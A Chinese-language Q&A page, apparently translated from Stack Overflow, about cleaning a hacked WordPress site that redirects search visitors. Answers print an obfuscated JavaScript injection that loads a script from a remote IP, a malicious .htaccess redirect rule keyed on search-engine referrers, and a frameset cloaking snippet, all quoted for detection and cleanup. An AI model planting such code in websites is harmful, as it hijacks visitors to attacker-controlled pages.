谷歌搜索后页面重定向 - Wordpress 网站被黑
Posted
技术标签:
【中文标题】谷歌搜索后页面重定向 - Wordpress 网站被黑【英文标题】:page redirect after Google search - Wordpress site hacked 【发布时间】:2014-05-10 13:44:59 【问题描述】:我们有页面域..,当您在 google.nl 搜索到关键对齐并单击该站点的主页时,几秒钟后您将被重定向到 http://www.venusfactor.com/welcome/。我们认为该网站已被黑客入侵,但找不到重定向或任何东西。
有人可以帮忙吗?
【问题讨论】:
【参考方案1】:您是否检查过是否在托管域的位置进行了重定向?不知道您使用的是哪种主机,但可能该域已设置为从主机端重定向到该页面。
【讨论】:
【参考方案2】:当您的网站被黑客入侵时该怎么做的一个很好的指南是:http://codex.wordpress.org/FAQ_My_site_was_hacked
对于您的问题,请先检查 .htaccess。文件的最右侧可能有一些重定向行,因此请使用水平滚动条。
另外,我建议与您的主机核实,因为可能有更多文件受到影响。
【讨论】:
感谢您的回复,我们确实查看了 htacces,但里面什么也没有。我现在正在下载该站点以查看其他文档。您是否有其他文件您认为可能会导致问题?当我查看页面的代码时,我找不到任何东西 现在好像修好了?它不再重定向我。另外,我记得它在短暂延迟后重定向。这可能意味着使用 javascript 进行重定向。检查您的 .js 文件中是否有类似“window.location.href” 是的,我看到 de index.php 和其他文件中有额外的代码。通过 Sucuri.net 检查显示它有恶意软件,但不知道哪些文件也有问题。你知道有一种方法可以检查哪些文件是错误的吗? 如果您可以访问 SSH 并且知道如何使用它,那么我建议您检查最后修改的文件 (***.com/a/1404964/395160) 或搜索包含该字符串(或部分)的文件其中)你在那个 index.php 文件中找到了(***.com/a/8010605/395160)。如果您不擅长 SSH,请下载 mythicsoft.com/agentransack 并在您之前下载的文件中检查该字符串【参考方案3】:同样的事情也发生在我身上。
首先我认为这是一个 DNS hack 问题,因为它是一个重定向问题。托管公司回复我说 DNS 没有问题。 Tey 检查了其他常见问题以找到重定向的来源,我被告知在活动主题文件夹中的 header.php 文件中有一个恶意脚本。
我在 cPanel 中手动检查了文件,并找到了导致重定向的脚本。要了解有关此的更多信息,请查看IStartBlogging上的文章
【讨论】:
【参考方案4】:一种新病毒正在传播,它滥用 wordpress 的 xmlrpc.php 将自己注入服务器并用自己的受污染副本替换 javascript 文件。
如果您看到太多 xmlrpc 请求来自可疑 IP 地址的 POST 请求,如下所示,请验证您的 javascript 文件的完整性。
$text = 'var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))
该病毒的一个关键特征是,它主要针对 jQuery.js,将其替换为自己的版本(当用户浏览您的网站时,自动将他们重定向到点击诱饵文章)。
它通过首先发布一个新的 php 文件来实现这一点,例如 recure.php
通常包含混淆的 php 代码,或者将 wordpress 插件上传到上传文件夹。
【讨论】:
【参考方案5】:如果引用的页面是 google、yahoo、msn、aol、bing,则攻击者很可能试图将页面重定向到不同的网站。 当我们从上面指定的引荐中请求页面时,他们将返回一个框架集(类似于 iframe)。
<frameset rows="*,0" framespacing="0" border="0" frameborder="NO" data-gr-c-s-loaded="true">
<frame src="http://remote_site_address_here" noresize="" scrolling="auto">
<link rel="stylesheet" type="text/css" href="chrome-extensionlink/content.css">
</frameset>
所以我们会在地址栏顶部看到我们的网站名称,但网站内容会有所不同。这些是黑客用来注入可疑代码的常用文件。
-
index.php
index.html
header.php
footer.php
functions.php
主题文件
.htaccess
现在最近感染的案例显示恶意代码注入是使用 .htaccess 文件。这里我演示注入的 .htaccess 文件。 打开 Web 根目录中的 .htaccess 文件。你可以看到这个配置
RewriteEngine On
RewriteCond %HTTP_USER_AGENT (google|yahoo|msn|aol|bing) [OR]
RewriteCond %HTTP_REFERER (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ emilie-amethyst.php?$1 [L]
如果推荐页面是 google|yahoo|msn|aol|bing,他们会在此处重定向到恶意 php 文件 emilie-amethyst.php。这就是重定向问题的原因。 因此,您必须从 .htaccess 文件中删除此重定向配置,并删除恶意脚本(在本例中为 emilie-amethyst.php)。
尝试点击谷歌搜索中的链接。不过,如果您发现问题,请删除与此特定站点相关的所有 cookie 并重试。它应该可以解决问题
【讨论】:
以上是关于谷歌搜索后页面重定向 - Wordpress 网站被黑的主要内容,如果未能解决你的问题,请参考以下文章